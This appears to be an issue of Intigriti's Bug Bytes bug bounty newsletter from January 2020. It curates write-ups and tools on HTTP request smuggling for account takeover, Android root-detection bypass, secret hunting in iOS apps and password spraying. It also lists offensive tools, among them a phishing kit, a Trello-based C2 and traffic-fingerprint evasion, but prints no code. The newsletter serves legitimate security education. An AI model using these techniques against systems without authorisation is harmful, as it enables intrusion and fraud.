Bug Bytes #52 – Account takeover via HTTP Request Smuggling, Lesser-known Tools for Android Application PenTesting and Hunting Credentials and Secrets in iOS Apps

By Intigriti

January 7, 2020

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.

This issue covers the week from 27 of December to 03 of January.

Our favorite 5 hacking items

1. Video of the week

Finding Your First Bug: Goal Setting / Remote Code Execution (RCE)

This title is voluntarily misleading. The video is not exactly about finding RCEs, rather how to use goal setting and motivation to learn and eventually get your first RCE.
This comes at a perfect time when many hackers (especially bug hunters) are sharing their goals for the new year.
But there is a huge different between a goal expressed as a wish, and measurable and realistic goals accompanied by an actionable plan.
So, this is an absolutely must watch if you want to learn about goal setting (using the S.M.A.R.T. method) applied to bug bounty, how to create an action plan (using the GROW method), non technical skills you need to develop as a hacker, and much more.
If I could like this a hundred times, I would! Thanks @InsiderPhD ♡

2. Writeup of the week

Account takeover via HTTP Request Smuggling

This is an excellent walkthrough of a HTTP Request Smuggling attack. It goes beyond detection and shows how to confirm and exploit the vulnerability for account takeover.
This is interesting because simple detection with Burp’s Request Smuggler plugin is not enough, as it is prone to false positives.

3. Tools of the week

Endpointdiff
Hakrawler & Introduction

These are two nice additions to a Web app tester’s arsenal.
Endpointdiff can help with JavaScript files monitoring. Its uses LinkFinder to retrieve endpoints from JS files and compares the output with the previous results.
Hakrawler is described as a simple, fast web crawler designed for easy, quick discovery of endpoints and assets. It is similar to Photon but written in Go and made for crawling large lists of domains. It also has an option to export the results for chaining with other tools like Sqlmap.

4. Resource of the week

Lesser-known Tools for Android Application PenTesting

Amazing article by @CaptMeelo for anyone interested in testing the security of Android apps.
It’s about some tools he finds helpful for assessments. They are useful for:

  • Bypassing protections against screenshots

  • Byassing Root detection

  • Using ADB over Wifi

  • A better method for retrieving logs (simplified and colorful output)

  • Removing the terminal size limitation when using ADB shell

Low-Hanging Apples: Hunting Credentials and Secrets in iOS Apps
Password Spraying Dell SonicWALL Virtual Office

The first link is a cool tutorial by @spaceraccoonsec on finding credentials and secrets in iOS apps. Methods explained include both static and dynamic analysis.
These are the basics that can help snag heasy bounties or help with traditional penetration testing. Very helpful indeed!
The second tutorial by @n00py1 goes through a situation where using Burp Macros was necessary. The login functionality he was testing used a CSRF token. So, it was not possible to test it with Intruder without setting up a macro and creating a session handling rule. The article shows exactly how to do that.

Other amazing things we stumbled upon this week

Videos

Podcasts

Webinars & Webcasts

Conferences

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible(ish) disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Parsuite & Introduction: Simple parser framework

  • Random_user-agent.py: Script to make every request through Burp have a random User-Agent. Combined with the Python Scripter Burp Extension & proxycannon-ng, your traffic will be tougher to fingerprint

More tools, if you have time

  • Turbolist3r: A fork of the sublist3r subdomain discovery tool. In addition to the original OSINT capabilties of sublist3r, turbolist3r automates some analysis of the results, with a focus on subdomain takeover.

  • Bountystrike-sh

  • Dirlstr: Finds Directory Listings or open S3 buckets from a list of URLs

  • Kostebek: A reconnaissance tool which uses firms’ trademark information to discover their domains

  • IotShark: Monitoring and Analyzing IoT Traffic

  • PENIOT: Penetration Testing Tool for IoT

  • PHP Version Audit: Audit your PHP version for known CVEs and patches

  • HiddenEye: Modern Phishing Tool With Advanced Functionality And Multiple Tunnelling Services

  • TrelloC2: Simple C2 over the Trello API

Misc. pentest & bug bounty resources

Challenges

Articles

News

Bug bounty & Pentest news

Vulnerabilities

Breaches & Attacks

Malicious apps/sites

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 12/27/2019 to 01/03/2019.

The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.

Curated by Pentester Land & Sponsored by Intigriti

You may also like